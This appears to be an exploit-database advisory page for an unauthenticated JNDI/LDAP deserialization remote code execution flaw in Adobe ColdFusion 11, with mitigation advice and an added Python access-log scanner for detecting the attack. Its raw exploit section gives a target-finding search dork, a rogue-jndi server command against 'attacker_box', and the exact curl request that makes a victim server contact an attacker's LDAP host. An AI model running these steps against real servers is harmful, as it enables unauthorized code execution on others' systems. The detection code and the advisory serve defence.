Vendor: Adobe ColdFusion
By: Amel BOUZIANE-LEBLOND
CVSS: 7.5 (HIGH)
Title: LDAP Java Object Deserialization Remote Code Execution
CWE:
Product Name: Adobe ColdFusion
Affected Version From: Adobe Coldfusion 11.0.03.292866
Affected Version To: Adobe Coldfusion 11
Patch Exists: NO
Related CWE:
CPE: a:adobe:coldfusion:11.0.03.292866
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows Server, Linux
Year: 2022

Adobe ColdFusion 11 – LDAP Java Object Deserialization Remote Code Execution (RCE)

ColdFusion allows an unauthenticated user to make the server connect to any LDAP server. An attacker can exploit this to achieve remote code execution through a JNDI attack via the 'verifyldapserver' parameter of utils.cfc.

Mitigation:

Apply the necessary security patches or updates provided by Adobe. Restrict access to the ColdFusion server from untrusted networks. Monitor network traffic for any suspicious activity.
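As an added illustration of the monitoring point above (this is not part of the original advisory or of ColdFusion), the following Python scans web-server access logs for the utils.cfc request this page describes and flags verifyldapserver calls whose vserver is not on a site-specific allowlist. The sample log lines, the combined-log format and the allowlist are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Feb/2022:10:01:12 +0000] "GET /CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=ldap.corp.example&vport=389&vstart=&vusername=&vpassword=&returnformat=json HTTP/1.1" 200 48
203.0.113.7 - - [22/Feb/2022:10:02:55 +0000] "GET //CFIDE/wizards/common/utils.cfc?Method=verifyldapserver&vserver=203.0.113.7&vport=1389&vstart=&vusername=&vpassword=&returnformat=json HTTP/1.1" 200 48
10.0.0.9 - - [22/Feb/2022:10:03:01 +0000] "GET /index.cfm HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Assumption: the only LDAP hosts this ColdFusion instance should ever be asked to verify.
ALLOWED_LDAP_HOSTS = {"ldap.corp.example"}
WIZARD_PATH = "/cfide/wizards/common/utils.cfc"

def parse_line(line):
    """Parse one access-log line; returns None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Split the request target ourselves: urlparse would read a leading '//' as a netloc.
    path, _, query = rec["target"].partition("?")
    # Collapse repeated slashes and lower-case: CFML paths and query keys are case-insensitive.
    rec["path"] = re.sub(r"/+", "/", path).lower()
    rec["qs"] = {k.lower(): v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    return rec

def classify(rec):
    """Return an alert line for a verifyldapserver call to a non-allowlisted host, else None."""
    if rec["path"] != WIZARD_PATH or rec["qs"].get("method", "").lower() != "verifyldapserver":
        return None
    vserver = rec["qs"].get("vserver", "")
    if vserver in ALLOWED_LDAP_HOSTS:
        return None
    return (f"{rec['ts']} src={rec['src']} verifyldapserver to unexpected LDAP host "
            f"{vserver!r} vport={rec['qs'].get('vport', '')} status={rec['status']}")

def scan(log_text):
    """Run every line through the parser and collect alerts."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (alert := classify(rec)):
            alerts.append(alert)
    return alerts
```

Running `scan(SAMPLE_LOG)` yields one alert, for the request that points the server at 203.0.113.7; the call to the allowlisted directory and the unrelated page view are ignored.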

Exploit-DB raw data:

# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remote Code Execution (RCE)
# Google Dork: intext:"adobe coldfusion 11"
# Date: 2022-22-02
# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested on: Microsoft Windows Server & Linux

# Description:
# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.
# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc

==================== 1.Setup rogue-jndi Server ====================

https://github.com/veracode-research/rogue-jndi


==================== 2.Preparing the Attack =======================

java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"

==================== 3.Launch the Attack ==========================


http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json


curl -i -s -k -X $'GET' \
    -H $'Host: target' \
    --data-binary $'\x0d\x0a\x0d\x0a' \
    $'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json'


==================== 4.RCE =======================================

Depending on the target, the rogue-jndi server needs to be compiled with Java 7 or 8.
This can be done by modifying the pom.xml as below:

<configuration>
<source>7</source>
<target>7</target>
</configuration>